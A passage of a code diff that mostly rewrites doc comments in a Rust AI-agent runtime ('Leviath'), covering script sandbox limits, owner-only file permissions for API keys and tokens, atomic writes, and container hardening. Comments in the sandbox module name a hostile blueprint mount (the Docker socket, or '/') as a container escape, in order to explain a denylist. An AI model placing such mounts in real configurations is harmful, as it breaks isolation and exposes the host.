-                // #413). A tripped breaker would otherwise hold the retry
-                // until its cooldown lapses, making the resume look ignored.
+                // a top-up after a run paused on exhausted credits. A tripped
+                // breaker would otherwise hold the retry until its cooldown
+                // lapses, making the resume look ignored.
                 if let Some(mut circuits) = self
                     .world
                     .get_resource_mut::<crate::pipeline::ProviderCircuits>()

--- a/crates/leviath-runtime/src/world/providers.rs
+++ b/crates/leviath-runtime/src/world/providers.rs
@@ -1,11 +1,11 @@
 //! Swapping the world's provider registry for one built from a newer config.
 //!
-//! The daemon builds its registry from `config.toml` once at boot and holds
-//! it as the [`Providers`] resource. A user who then ran `lev setup` to move
-//! to another provider, or removed a key, found every new run still resolving
-//! against the boot-time set: the file had changed, the registry had not, and
-//! nothing short of a daemon restart rebuilt it. [`PipelineWorld::replace_providers`]
-//! is the seam that rebuild goes through.
+//! The registry lives as the [`Providers`] resource, built from `config.toml`.
+//! Nothing re-reads that file on its own, so a config change - `lev setup`
+//! moving to another provider, a key removed - reaches new runs only by
+//! replacing the resource. [`PipelineWorld::replace_providers`] is the one
+//! seam that replacement goes through, which is why the retiring and
+//! circuit-forgetting rules below live there and not at each caller.
 
 use super::*;
 use crate::pipeline::ProviderCircuits;

--- a/crates/leviath-scripting/src/engine.rs
+++ b/crates/leviath-scripting/src/engine.rs
@@ -19,7 +19,6 @@ impl ScriptEngine {
         let mut engine = Engine::new();
         crate::harden(&mut engine, TRANSFORM_MAX_OPERATIONS);
 
-        // Register Leviath functions and types
         crate::functions::register_functions(&mut engine);
         crate::types::register_types(&mut engine);
 
@@ -45,8 +44,10 @@ impl ScriptEngine {
 
     /// Evaluate a taint gate check script.
     ///
-    /// The script should define a `check(context)` function that returns bool.
-    /// Context map contains: tool, target, taint_level.
+    /// The script is evaluated with `context` in scope and must produce a
+    /// bool: an expression over `context`, or a body that ends by calling a
+    /// `check(context)` it defines. `context` holds `tool`, `target` and
+    /// `taint_level`.
     pub fn check_gate_rule(
         &self,
         script: &str,
@@ -68,8 +69,6 @@ impl ScriptEngine {
         let mut scope = Scope::new();
         scope.push("context", context);
 
-        // The script should end with a call to check(context) or
-        // be a simple expression that uses the 'context' variable.
         self.engine
             .eval_with_scope::<bool>(&mut scope, script)
             .map_err(|e| Error::ExecutionFailed(e.to_string()))
@@ -97,7 +96,6 @@ mod tests {
     #[test]
     fn test_engine_creation() {
         let engine = ScriptEngine::new();
-        // Just verify the engine was created successfully
         assert!(engine.engine.max_operations() > 0);
     }
 

--- a/crates/leviath-scripting/src/lib.rs
+++ b/crates/leviath-scripting/src/lib.rs
@@ -16,12 +16,9 @@ pub mod types;
 
 /// Apply the sandbox limits every Leviath Rhai engine shares.
 ///
-/// One function rather than a block copied into each engine constructor. There
-/// were three such copies - `ScriptEngine::new`, `build_tool_engine` (whose
-/// comment read "Same hardening as `ScriptEngine::new`", which it was not
-/// entirely), and the provider engine - with divergent limits and no way to add
-/// a control to all of them at once. This is a security control; it should have
-/// exactly one definition.
+/// One function rather than a block copied into each engine constructor. This
+/// is a security control: copies drift into divergent limits, and there is then
+/// no way to add a control to all of them at once.
 ///
 /// `max_operations` stays a parameter because it is a genuine policy difference:
 /// a provider script driving a streaming HTTP response legitimately runs longer

--- a/crates/leviath-scripting/src/stage_hook.rs
+++ b/crates/leviath-scripting/src/stage_hook.rs
@@ -1,4 +1,4 @@
-//! Script-backed stage lifecycle hooks (`[stages.<name>.hooks]`, issue #260).
+//! Script-backed stage lifecycle hooks (`[stages.<name>.hooks]`).
 //!
 //! Where a custom region's script owns one region's behaviour, these let a
 //! blueprint observe and steer the agent's own lifecycle: what the context
@@ -68,7 +68,7 @@ pub(crate) const HOOK_NAMES: &[&str] = &[
 /// Deliberately not `Option<Value>`: "proceed unchanged" and "proceed with
 /// this" are different answers, and so is "do not proceed". Collapsing them
 /// would make a cancelling hook indistinguishable from one that returned
-/// nothing, which is the failure mode the taint gate's own history warns about.
+/// nothing.
 #[derive(Debug, Clone, PartialEq)]
 pub enum HookOutcome {
     /// Proceed unchanged.

--- a/crates/leviath-scripting/src/tool.rs
+++ b/crates/leviath-scripting/src/tool.rs
@@ -417,9 +417,9 @@ impl ScriptToolSet {
 ///
 /// [`ScriptToolSet::discover`] asks the same two questions of files already on
 /// disk: are the annotations parseable, and does Rhai accept the script. An
-/// editor has to be able to ask before saving, and the only alternative was
-/// writing the candidate into a directory every agent executes from and reading
-/// the answer back out of the skipped list.
+/// editor has to be able to ask before saving, and the alternative is writing
+/// the candidate into a directory every agent executes from and reading the
+/// answer back out of the skipped list.
 ///
 /// `label` is what the error message names the source as, since there is no
 /// path to name. A sibling `tool.toml` cannot apply here for the same reason:
@@ -740,7 +740,7 @@ pub fn decode_base64(input: &str) -> HostRes<String> {
 /// byte becomes `%XX`.
 ///
 /// Public because the script *provider* engine registers the same `encode_uri`
-/// host function and had a byte-identical copy of this. Two encoders that
+/// host function and calls into this one. Two encoders that
 /// scripts reach by the same name is a difference waiting to be discovered by
 /// whoever writes a `.rhai` that works in one and not the other.
 pub fn percent_encode(input: &str) -> String {
@@ -1394,8 +1394,7 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
     }
 
     /// Exercises the registered bindings rather than the free functions: a
-    /// script calls both by name and gets its own text back. This is the part
-    /// that was missing - the tool engine offered neither.
+    /// script calls both by name and gets its own text back.
     #[test]
     fn execute_base64_round_trip_via_script() {
         let tool = tool_from("// @tool t\ndecode_base64(encode_base64(\"round trip · 🐙\"))");
@@ -1416,7 +1415,7 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
 
     #[test]
     fn execute_missing_optional_param_reads_as_unit() {
-        // Mirrors the issue's `params.count == ()` idiom.
+        // An unsupplied optional param reads as `()` in the script.
         let tool = tool_from("// @tool t\nif params.count == () { \"default\" } else { \"set\" }");
         let out = execute(&tool, serde_json::json!({"query": "x"}), FakeHost::arc());
         assert_eq!(out, "default");
@@ -1519,8 +1518,8 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
         // A panicking host function must NEVER unwind into Rhai: rhai's
         // `exec_native_fn_call` holds an `ArgBackup` whose destructor asserts,
         // so unwinding through it is a double panic → `abort()` → the whole
-        // daemon dies (issue #109). Each of these would have aborted the test
-        // process before the guards existed.
+        // daemon dies. Without the guards every one of these aborts the test
+        // process.
         for (host_fn, tool_name, script) in [
             ("http_get", "t", "// @tool t\nhttp_get(\"http://x\")"),
             (
@@ -1762,10 +1761,11 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
     /// `Debug`-escaped lookalike.
     ///
     /// Rhai's `map_basic` package registers `to_json(&mut Map)`, a more
-    /// specific signature than the `Dynamic` one this engine registers, so an
-    /// object map used to reach `format_map_as_json`. That writes strings with
-    /// `Debug`, which spells a narrow no-break space `\u{202f}`: not a JSON
-    /// escape, so whatever consumed the tool's output got something unparseable.
+    /// specific signature than the `Dynamic` one this engine registers, so
+    /// without a `Map` registration of its own an object map reaches
+    /// `format_map_as_json`. That writes strings with `Debug`, which spells a
+    /// narrow no-break space `\u{202f}`: not a JSON escape, so whatever
+    /// consumes the tool's output gets something unparseable.
     #[test]
     fn to_json_on_a_map_is_valid_json_for_non_printable_characters() {
         let text = "a\u{202f}b\u{200b}c\u{2011}d";
@@ -1937,11 +1937,10 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
 
     #[test]
     fn decode_entities_survives_multibyte_after_an_ampersand() {
-        // Regression for issue #109: the entity-scan window is a byte count, so
-        // a bare '&' followed by multi-byte text can slice mid-character and
-        // panic ("byte index 12 is not a char boundary") - inside a Rhai native
-        // fn, which aborts the daemon. Every one of these is a real shape from
-        // fetched HTML.
+        // Bounding the scan by bytes rather than characters slices
+        // mid-character on a bare '&' followed by multi-byte text ("byte index
+        // 12 is not a char boundary"), inside a Rhai native fn, which aborts
+        // the daemon. Every one of these is a real shape from fetched HTML.
         assert_eq!(decode_entities("&日本語日本"), "&日本語日本");
         assert_eq!(decode_entities("R&D 日本語です"), "R&D 日本語です");
         assert_eq!(decode_entities("&🎉🎉🎉🎉"), "&🎉🎉🎉🎉");
@@ -1953,10 +1952,10 @@ schema = { type = "string", enum = ["json", "yaml"], description = "Output forma
         assert_eq!(decode_entities("&amp;日本語"), "&日本語");
         // Trailing '&' at the very end of the string (window == 1).
         assert_eq!(decode_entities("tail&"), "tail&");
-        // Issue #115 re-reported the same crash with a flag emoji. '&' plus nine
-        // ASCII bytes puts the four-byte regional indicator at bytes 10..14, so
-        // a fixed byte-12 window cuts straight through it. Pinned verbatim so
-        // the reported input, not just an equivalent one, stays covered.
+        // '&' plus nine ASCII bytes puts a four-byte regional indicator at
+        // bytes 10..14, the offset a byte-counted window would cut through.
+        // Pinned verbatim so this exact offset, not just an equivalent one,
+        // stays covered.
         assert_eq!(decode_entities("&abcdefghi🇸"), "&abcdefghi🇸");
     }
 

--- a/crates/leviath-scripting/src/types.rs
+++ b/crates/leviath-scripting/src/types.rs
@@ -60,7 +60,7 @@ pub fn register_types(engine: &mut Engine) {
 
     // Token budget helpers. The operands come from a script (ultimately from
     // model output), so plain `-` would panic on overflow in a debug build -
-    // and a panic inside a Rhai native fn aborts the process (#109).
+    // and a panic inside a Rhai native fn aborts the process.
     engine.register_fn(
         "tokens_remaining",
         |max_tokens: i64, current_tokens: i64| -> i64 { max_tokens.saturating_sub(current_tokens) },
@@ -251,7 +251,7 @@ mod tests {
     #[test]
     fn tokens_remaining_saturates_instead_of_overflowing() {
         // The operands come from a script, so extreme values must not panic -
-        // a panic in a Rhai native fn aborts the daemon (issue #109).
+        // a panic in a Rhai native fn aborts the daemon.
         let e = engine();
         let low: i64 = e.eval("tokens_remaining(-9223372036854775808, 1)").unwrap();
         assert_eq!(low, i64::MIN);

--- a/crates/leviath-sys/src/browser.rs
+++ b/crates/leviath-sys/src/browser.rs
@@ -114,10 +114,9 @@ mod tests {
     }
 
     /// The failure arm logs, and `tracing::warn!` evaluates its field values
-    /// only when a subscriber is interested. Without one installed the `%e`
-    /// field closure never runs - so this test exercised the branch while
-    /// leaving the logging inside it unexecuted. `with_tracing` is the same
-    /// always-on-subscriber shim `leviath-cli` uses for exactly this.
+    /// only when a subscriber is interested. Without one the `%e` field closure
+    /// never runs, so the branch counts as exercised while the logging inside it
+    /// does not. `with_tracing` installs the subscriber that makes it run.
     #[test]
     fn open_url_via_reports_spawn_failure() {
         fn boom(_: &mut Command) -> std::io::Result<()> {

--- a/crates/leviath-sys/src/disk.rs
+++ b/crates/leviath-sys/src/disk.rs
@@ -1,8 +1,8 @@
 //! How much room is left on the filesystem a path lives on.
 //!
 //! Leviath asks this before letting an agent write, because the failure it
-//! guards against is not a bad write but a full disk: a run that filled `C:`
-//! took the machine down with it, and every other process on it (issue #252).
+//! guards against is not a bad write but a full disk: a run that fills `C:`
+//! takes the machine down with it, and every other process on it.
 //!
 //! There is no free-space API in `std`, and this workspace forbids `unsafe`, so
 //! the syscall is delegated to `fs4` - the same arrangement `nix` has here for
@@ -110,9 +110,8 @@ mod tests {
     /// The empty path rather than a missing one, and that distinction is the
     /// whole reason this comment exists. A *missing* path is unmeasurable on
     /// Unix and perfectly measurable on Windows, where `fs4` resolves to the
-    /// volume first - so asserting `None` for one passed on three CI legs and
-    /// failed on the fourth, and left this branch unreachable there. An empty
-    /// path has no volume to resolve to on either.
+    /// volume first, so asserting `None` for one leaves this branch unreachable
+    /// there. An empty path has no volume to resolve to on either.
     #[test]
     fn an_unmeasurable_path_answers_none() {
         assert_eq!(available_bytes(Path::new("")), None);

--- a/crates/leviath-sys/src/keychain.rs
+++ b/crates/leviath-sys/src/keychain.rs
@@ -217,7 +217,6 @@ mod imp {
             );
         }
 
-        /// Accounts do not leak into each other.
         /// The public shims at the crate root - the path every caller actually
         /// takes - driven against the mock store under the lock.
         #[test]

--- a/crates/leviath-sys/src/osinfo.rs
+++ b/crates/leviath-sys/src/osinfo.rs
@@ -152,9 +152,8 @@ mod tests {
         assert_eq!(display_name_for("solaris"), "solaris");
     }
 
-    /// All three quoting styles occur across distributions, and the whole line
-    /// must match the key - `VERSION_ID` must not be answered by
-    /// `IMAGE_VERSION_ID`.
+    /// `PRETTY_NAME` already reads as an answer, so it wins over `VERSION_ID`
+    /// when a release file carries both.
     #[test]
     fn os_release_prefers_pretty_name_over_version_id() {
         let text = "NAME=\"Ubuntu\"\nVERSION_ID=\"24.04\"\nPRETTY_NAME=\"Ubuntu 24.04.1 LTS\"\n";

--- a/crates/leviath-sys/src/perms.rs
+++ b/crates/leviath-sys/src/perms.rs
@@ -29,10 +29,9 @@ pub fn ensure_file_private(path: &Path) -> io::Result<Option<u32>> {
 ///
 /// `fs::write` followed by a `chmod` is the obvious shape and has a window: the
 /// file is created at `0o666 & ~umask` - typically `0o644` - and is
-/// world-readable until the `chmod` lands. Both files that hold Leviath's
-/// secrets were written that way, so `config.toml` (every provider API key) and
-/// `mcp-auth.json` (OAuth access and refresh tokens) each had a moment of being
-/// readable by any local user, on every save.
+/// world-readable until the `chmod` lands. That is a moment on every save where
+/// `config.toml` (every provider API key) and `mcp-auth.json` (OAuth access and
+/// refresh tokens) are readable by any local user.
 ///
 /// Creating the file with the mode already set closes that. On non-Unix this is
 /// a plain write - the mode argument has no meaning there, and Windows ACL
@@ -51,11 +50,11 @@ pub fn write_private(path: &Path, contents: &[u8]) -> io::Result<()> {
 /// owner-only. A symlink at `path` is followed: the file it points at is what
 /// is replaced, not the link.
 ///
-/// `fs::write` truncated the target first and then wrote into it, which is
-/// the shape that left `config.toml`, a blueprint or the dashboard's memory
-/// empty when the process died between the two. The inode changes on every
-/// save now, which is what atomic replacement means; anything holding the
-/// old file open keeps the old bytes.
+/// Use this rather than `fs::write`, which truncates the target and then
+/// writes into it: a process that dies between the two leaves `config.toml`,
+/// a blueprint or the dashboard's memory empty. The inode changes on every
+/// save, which is what atomic replacement means; anything holding the old
+/// file open keeps the old bytes.
 pub fn write_atomic(path: &Path, contents: &[u8], mode: Option<u32>) -> io::Result<()> {
     write_atomic_with(path, contents, mode, persist)
 }
@@ -115,19 +114,19 @@ pub fn write_atomic_with(
 ///
 /// [`write_private`] covers a file written in one shot. A file that is appended
 /// to over time cannot use it, and opening one plainly creates it at the umask
-/// default. That is how a run's archive (`run.lvr`) and its stage logs ended up
-/// world-readable: nobody chose `0o644` for them, they inherited it, while the
-/// answer sidecar written beside them through `write_private` was owner-only.
+/// default, so a run's archive (`run.lvr`) and its stage logs inherit `0o644`
+/// rather than anyone choosing it.
 ///
-/// The containing run directory is `0o700`, so those files were not reachable in
+/// The containing run directory is `0o700`, so those files are not reachable in
 /// place. Directory permissions do not survive a copy though, and `tar`, `rsync`
 /// or a backup tool preserves the per-file mode while dropping the protection
 /// the directory was providing.
+///
 /// On Windows the restriction is best-effort: a failed ACL call still yields an
 /// open file. [`write_private`] guards secrets and fails instead, but these are
-/// a run's own files, which until now were created at the default and never
-/// restricted at all. Refusing to open one because `icacls` did not run would
-/// trade "less protected than intended" for "the run cannot record anything".
+/// a run's own files, and refusing to open one because `icacls` did not run
+/// would trade "less protected than intended" for "the run cannot record
+/// anything".
 pub fn open_private_append(path: &Path) -> io::Result<std::fs::File> {
     crate::platform::open_append_with_mode(path, 0o600)
 }
@@ -221,9 +220,8 @@ mod tests {
         assert!(write_private(&path, b"x").is_err());
     }
 
-    /// The gap this closes: a file opened plainly for append is created at the
-    /// umask default, typically `0o644`. `run.lvr` and the stage logs were
-    /// created that way while the answer sidecar beside them was owner-only.
+    /// A file opened plainly for append is created at the umask default,
+    /// typically `0o644`; `run.lvr` and the stage logs must not be.
     #[test]
     fn open_private_append_creates_an_owner_only_file() {
         #[cfg(windows)]
@@ -261,8 +259,7 @@ mod tests {
     }
 
     /// The mode passed to `open(2)` applies only on creation, so a file that
-    /// already exists at looser permissions has to be tightened. A run started
-    /// before this change has exactly that shape.
+    /// already exists at looser permissions has to be tightened.
     #[test]
     fn open_private_append_retightens_an_existing_permissive_file() {
         #[cfg(windows)]
@@ -388,8 +385,6 @@ mod tests {
         assert_eq!(mode_of(&nested), 0o700);
     }
 
-    /// Called on every stage line, so it has to be idempotent rather than
-    /// failing once the directory is there.
     /// A failed create has to be reported, not swallowed. The caller decides
     /// whether it can carry on without the directory; it cannot decide that if
     /// it was told the directory is there.
@@ -408,6 +403,8 @@ mod tests {
         assert!(create_private_dir_all(&blocker).is_err());
     }
 
+    /// Called on every stage line, so it has to be idempotent rather than
+    /// failing once the directory is there.
     #[test]
     fn create_private_dir_all_is_idempotent() {
         #[cfg(windows)]

--- a/crates/leviath-sys/src/platform/mod.rs
+++ b/crates/leviath-sys/src/platform/mod.rs
@@ -1,7 +1,7 @@
 //! Internal platform dispatch.
 //!
-//! Each public topic module at the crate root (`perms`, and later `process`,
-//! `tty`, `exe`) calls into the functions re-exported here. The `#[cfg]`
+//! The public topic modules at the crate root (`perms`, `process`, `osinfo`)
+//! call into the functions re-exported here. The `#[cfg]`
 //! selection of the real implementation happens in this one place, so the
 //! public API stays platform-agnostic and free of conditional compilation.
 //!

--- a/crates/leviath-sys/src/platform/unix.rs
+++ b/crates/leviath-sys/src/platform/unix.rs
@@ -55,9 +55,8 @@ pub(crate) fn write_with_mode(path: &Path, contents: &[u8], mode: u32) -> io::Re
 ///
 /// A run's archive and its stage logs are appended to over the life of the run,
 /// so they cannot go through `write_with_mode`. Opened plainly they are created
-/// at the umask default, which is how `run.lvr` - every context snapshot, the
-/// whole conversation, every tool result - ended up world-readable while the far
-/// smaller answer sidecar beside it was owner-only.
+/// at the umask default, which would leave `run.lvr` - every context snapshot,
+/// the whole conversation, every tool result - world-readable.
 ///
 /// As with `write_with_mode` the mode applies only on creation, so `set_mode`
 /// covers a file that already exists at looser permissions. Appending is the

--- a/crates/leviath-sys/src/platform/windows.rs
+++ b/crates/leviath-sys/src/platform/windows.rs
@@ -1,11 +1,10 @@
 //! Windows implementations.
 //!
 //! Windows has no POSIX mode bits; access control is an ACL on each object. The
-//! hardening this crate applies on Unix - "owner only, nobody else" - has a
-//! direct Windows equivalent, and until now it simply was not applied: every
-//! `secure_file_perms` call was a silent no-op, so `config.toml` (every provider
-//! API key) and `mcp-auth.json` (OAuth access *and refresh* tokens) carried
-//! whatever ACL they inherited from their parent.
+//! hardening this crate applies on Unix - "owner only, nobody else" - is
+//! applied here through an ACL, so `config.toml` (every provider API key) and
+//! `mcp-auth.json` (OAuth access *and refresh* tokens) do not simply carry
+//! whatever their parent granted.
 //!
 //! # Why `icacls` rather than the Win32 API
 //!
@@ -61,9 +60,9 @@ pub(crate) fn write_with_mode(path: &Path, contents: &[u8], _mode: u32) -> io::R
 ///
 /// **The restriction is best-effort, unlike [`write_with_mode`]'s.** That one
 /// guards secrets - an API key written unprotected is worse than not written at
-/// all, so its failure propagates. These two are for a run's own files, which
-/// until now were created at the default and never restricted. Failing the
-/// create on a failed `icacls` would trade "less protected than intended" for
+/// all, so its failure propagates. These two are for a run's own files, and
+/// failing the create on a failed `icacls` would trade "less protected than
+/// intended" for
 /// "the run cannot record anything", which is the worse of the two, and it
 /// would make persistence depend on spawning a process.
 pub(crate) fn open_append_with_mode(path: &Path, _mode: u32) -> io::Result<std::fs::File> {
@@ -125,7 +124,7 @@ pub(crate) fn configure_detached(cmd: &mut std::process::Command) {
 /// from Explorer, a service, or a UI console - the OS allocates a fresh window
 /// and shows it on the interactive desktop. An agent calling the `shell` tool
 /// runs `cmd.exe` dozens of times per run, so that is a flood of flashing
-/// windows, and concurrent agents make it worse (issue #228).
+/// windows, and concurrent agents make it worse.
 ///
 /// `CREATE_NO_WINDOW` says "this is a console application, run it without a
 /// console window". It is right only for a child whose stdio is already piped
@@ -223,15 +222,13 @@ fn interpret_icacls(success: bool, stderr: &[u8], path: &Path) -> io::Result<()>
 ///
 /// Some tests mutate those variables process-wide to prove errors propagate;
 /// others spawn the real `icacls`, which reads both. `cargo test` runs them in
-/// parallel threads of one process, so an unguarded spawner can catch a
-/// mutator's environment mid-flight. On CI that surfaced as `ensure_private`
-/// failing with "The system cannot find the path specified": `SystemRoot`
-/// momentarily pointed at `C:\definitely-not-windows` while another test was
-/// proving that a missing `icacls` is reported.
+/// parallel threads of one process, so an unguarded spawner catches a
+/// mutator's environment mid-flight and `ensure_private` fails with "The
+/// system cannot find the path specified".
 ///
 /// `temp_env` locks against its own calls, not against a test that reads the
-/// variable directly, so both sides have to take *this* guard. Same shape as
-/// the credential-store lesson: two guards are not a guard.
+/// variable directly, so both sides have to take *this* guard. Two guards are
+/// not a guard.
 ///
 /// `pub(crate)` because the `perms` tests reach the same spawn through the
 /// public API and race identically.

--- a/crates/leviath-sys/src/process.rs
+++ b/crates/leviath-sys/src/process.rs
@@ -19,7 +19,7 @@ pub fn configure_detached(cmd: &mut Command) {
 /// none, such as the daemon started from Explorer, from a service, or from a UI
 /// console, gets a brand new window on the interactive desktop. Agent tooling
 /// spawns `cmd.exe` many times per run, so without this the desktop fills with
-/// flashing consoles (issue #228). Elsewhere this is a no-op: no other platform
+/// flashing consoles. Elsewhere this is a no-op: no other platform
 /// hands a child a window.
 ///
 /// Apply it to a child whose stdout/stderr are already piped or nulled, which
@@ -38,11 +38,10 @@ pub fn hide_console_window(cmd: &mut Command) {
 
 /// A [`Command`] for a child that must not take a console window.
 ///
-/// **This is where the decision is made.** Hiding used to be a second call the
-/// caller made after building the command, at seven sites across five crates,
-/// and a new spawn site that forgot it looked exactly like one that did not
-/// need it. Making it part of construction means the only way to get a child
-/// process is to have already answered the question.
+/// **This is where the decision is made.** Hiding as a separate call after the
+/// command is built leaves a spawn site that forgot it looking exactly like one
+/// that does not need it. Making it part of construction means the only way to
+/// get a child process is to have already answered the question.
 ///
 /// The counterpart is [`terminal_command`], for the single child that is meant
 /// to be seen. There is no third option on purpose: a `Command::new` outside

--- a/crates/leviath-sys/src/sandbox.rs
+++ b/crates/leviath-sys/src/sandbox.rs
@@ -76,8 +76,8 @@ pub struct ContainerRunSpec<'a> {
 
 /// Host paths that must never be bind-mounted into an agent's container.
 ///
-/// `mounts` comes from the blueprint - a file the user downloaded - and was
-/// interpolated straight into `-v {m}:{m}`. `mounts = ["/var/run/docker.sock"]`
+/// `mounts` comes from the blueprint - a file the user downloaded - and reaches
+/// `-v {m}:{m}`. `mounts = ["/var/run/docker.sock"]`
 /// is a one-line container escape (the container can then create a *privileged*
 /// container on the host), and `mounts = ["/"]` makes the isolation decorative.
 ///
@@ -109,11 +109,9 @@ pub(crate) fn mount_allowed(path: &str) -> bool {
     // POSIX semantics spelled out rather than `std::path::Path`, because these
     // are paths *inside a Linux container* - the host's rules do not apply to
     // them. On Windows `Path::new("/data").is_absolute()` is false (an absolute
-    // path there needs a drive letter), so routing this through `Path` refused
-    // every legitimate container mount on Windows while behaving correctly on
-    // Unix. Fail-closed, so not a hole - but containers were unusable, and no
-    // test caught it because the host and the container agreed on every
-    // platform the tests ran on.
+    // path there needs a drive letter), so routing this through `Path` would
+    // refuse every legitimate container mount on Windows while behaving
+    // correctly on Unix.
     let absolute = path.starts_with('/');
     let traverses = path.split('/').any(|segment| segment == "..");
     if !absolute || traverses {
@@ -137,10 +135,10 @@ pub(crate) fn mount_allowed(path: &str) -> bool {
 ///
 /// Hardened beyond plain `run`: the container drops every capability, cannot
 /// regain privileges via setuid binaries, and is bounded in processes and
-/// memory. Without these it ran as **root inside** with the default capability
-/// set - so "sandboxed" bought isolation of the filesystem view and nothing
-/// else, and anything written to the bind-mounted workdir came back root-owned
-/// on the host.
+/// memory. Without them the container runs as **root inside** with the default
+/// capability set, so "sandboxed" buys isolation of the filesystem view and
+/// nothing else, and anything written to the bind-mounted workdir comes back
+/// root-owned on the host.
 ///
 /// `mounts` entries are filtered through `mount_allowed`; a refused entry is
 /// dropped rather than silently honored.
@@ -337,10 +335,10 @@ mod tests {
 
     /// Ordinary project directories still mount - the denylist is about host
     /// infrastructure, not about making the feature unusable.
+    ///
     /// The rule is POSIX, not host-native: a container path is a Linux path
-    /// wherever the daemon happens to be running. Routing it through
-    /// `std::path::Path` made every mount fail on Windows, where `/data` is not
-    /// an absolute path.
+    /// wherever the daemon happens to be running, so `/data` is absolute here
+    /// even on Windows, where `std::path::Path` says otherwise.
     #[test]
     fn mount_rules_do_not_depend_on_the_host_platform() {
         // Absolute in POSIX terms, on every host.
@@ -408,8 +406,8 @@ mod tests {
                 "--name",
                 "lev-abc",
                 // Hardening flags: no capabilities, no privilege regain, and
-                // bounded processes/memory. Without them the container ran as
-                // root inside with the default capability set.
+                // bounded processes/memory. Without them the container runs
+                // as root inside with the default capability set.
                 "--cap-drop",
                 "ALL",
                 "--security-opt",

--- a/crates/leviath-telemetry/src/lib.rs
+++ b/crates/leviath-telemetry/src/lib.rs
@@ -1,4 +1,4 @@
-//! OpenTelemetry export for Leviath's telemetry event stream (issue #73).
+//! OpenTelemetry export for Leviath's telemetry event stream.
 //!
 //! The runtime emits pure-data [`TelemetryEvent`](leviath_core::telemetry::TelemetryEvent)s
 //! into whatever [`TelemetrySink`] the host installs; this crate provides the
@@ -103,8 +103,8 @@ mod tests {
 
     #[tokio::test(flavor = "multi_thread")]
     async fn otlp_exporter_builds_from_a_runtime_thread_with_a_log_layer() {
-        // The regression this guards: blocking-client construction panics on a
-        // tokio thread unless it's hopped to a plain one.
+        // Blocking-client construction panics on a tokio thread unless it is
+        // hopped to a plain one.
         let built = build_sink(&config(true, TelemetryExporterKind::Otlp)).unwrap();
         assert!(built.log_layer.is_some());
     }

--- a/crates/leviath-telemetry/src/log_sink.rs
+++ b/crates/leviath-telemetry/src/log_sink.rs
@@ -281,7 +281,7 @@ mod tests {
             ),
             (
                 // Same tallies, but the run changed nothing: the line has to
-                // say so, or it reads as a success (issue #192).
+                // say so, or it reads as a success.
                 TelemetryEvent::RunCompleted {
                     run_id: "r1".to_string(),
                     status: "complete".to_string(),

--- a/crates/leviath-telemetry/src/otel.rs
+++ b/crates/leviath-telemetry/src/otel.rs
@@ -196,7 +196,7 @@ impl LaneInstruments {
     }
 }
 
-/// Providers taken out of service by their circuit breaker (issue #201).
+/// Providers taken out of service by their circuit breaker.
 ///
 /// Per-provider levels rather than one total, because "which provider is down"
 /// is the whole question an operator has; a bare count answers none of it.
@@ -1133,7 +1133,7 @@ mod tests {
 
     /// The empty-run counter has to survive a completion whose span this
     /// process never opened, or a daemon restart would silently under-count
-    /// exactly the runs the metric exists to find (issue #192).
+    /// exactly the runs the metric exists to find.
     #[test]
     fn a_completion_counts_even_without_an_open_span() {
         let h = harness();

--- a/crates/leviath-testkit/src/lib.rs
+++ b/crates/leviath-testkit/src/lib.rs
@@ -5,9 +5,8 @@
 //! inside other packages' gated test suites, and self-gating test scaffolding
 //! forces tests-of-test-helpers with no defect-finding power.
 //!
-//! Shared here so each helper has exactly one definition: copy-pasted
-//! per-package `test_support.rs` versions drift silently (`AlwaysOnSubscriber`
-//! reached five copies in two divergent designs, the raw-TCP mock server nine).
+//! Shared here so each helper has exactly one definition: a per-package
+//! `test_support.rs` copy drifts from the others silently.
 
 pub mod mcp_stub;
 
@@ -208,8 +207,8 @@ pub async fn spawn_mock_server_truncated_body(status: u16, reason: &str) -> Stri
 
 /// Poll `ready` until it answers true, or fail `context` after 30 seconds.
 ///
-/// The shape this replaces was open-coded at four call sites, and it kept
-/// costing the 100% coverage gate a rerun. The loop
+/// Open-coding this at a call site costs the 100% coverage gate a rerun. The
+/// loop
 ///
 /// ```ignore
 /// while !ready() {
@@ -219,10 +218,9 @@ pub async fn spawn_mock_server_truncated_body(status: u16, reason: &str) -> Stri
 ///
 /// never executes its body when the thing being waited for is already done by
 /// the first poll - which, on a multi-threaded runtime, is a coin flip. The
-/// sleep line then reports as uncovered with every test passing, and the fix
-/// was always "run the job again". Reordering the loop was tried and measured:
-/// it moves the hole rather than closing it, because whichever line the body
-/// starts with inherits the same race.
+/// sleep line then reports as uncovered with every test passing, and
+/// reordering the loop moves the hole rather than closing it: whichever line
+/// the body starts with inherits the same race.
 ///
 /// Living here is what settles it. `leviath-testkit` is dev-dependency-only
 /// scaffolding and is excluded from the gate for exactly this reason - its
@@ -230,10 +228,9 @@ pub async fn spawn_mock_server_truncated_body(status: u16, reason: &str) -> Stri
 /// tests of test helpers with no defect-finding power. One copy here means one
 /// racy line, in the one crate where a racy line is not a gate failure.
 ///
-/// The timeout is the other half. Two of the four sites had one and two did
-/// not, so a condition that never came true hung the suite until CI killed the
-/// job with no indication of which wait was stuck. `context` is what that
-/// failure says.
+/// The timeout is the other half: without it a condition that never comes true
+/// hangs the suite until CI kills the job, with no indication of which wait was
+/// stuck. `context` is what the failure says instead.
 pub async fn wait_until(context: &str, mut ready: impl FnMut() -> bool) {
     tokio::time::timeout(std::time::Duration::from_secs(30), async {
         while !ready() {

--- a/crates/leviath-testkit/src/mcp_stub.rs
+++ b/crates/leviath-testkit/src/mcp_stub.rs
@@ -1,11 +1,10 @@
-//! One parameterised Python stdio MCP server, in place of the near-identical
-//! JSON-RPC stub scripts that were pasted into each test module that needed a
-//! server to talk to.
+//! One parameterised Python stdio MCP server, shared by every test module that
+//! needs a server to talk to.
 //!
 //! The server reads one JSON-RPC request per line from stdin and answers
 //! `initialize`, `tools/list` and `tools/call`; notifications (requests with
 //! no `id`) are ignored and any other method gets a `-32601` error. Every
-//! knob a copy differed on is a builder method here, so a test that needs a
+//! knob is a builder method here, so a test that needs a
 //! server which fails `tools/list`, or one whose tool echoes the name it was
 //! called with, says so in Rust rather than in a second Python template.
 

--- a/crates/leviath-tools/src/context.rs
+++ b/crates/leviath-tools/src/context.rs
@@ -204,8 +204,8 @@ pub fn tool_name_spellings(name: &str) -> impl Iterator<Item = &str> {
 
 /// Redirects shell command execution off the host into a sandbox.
 ///
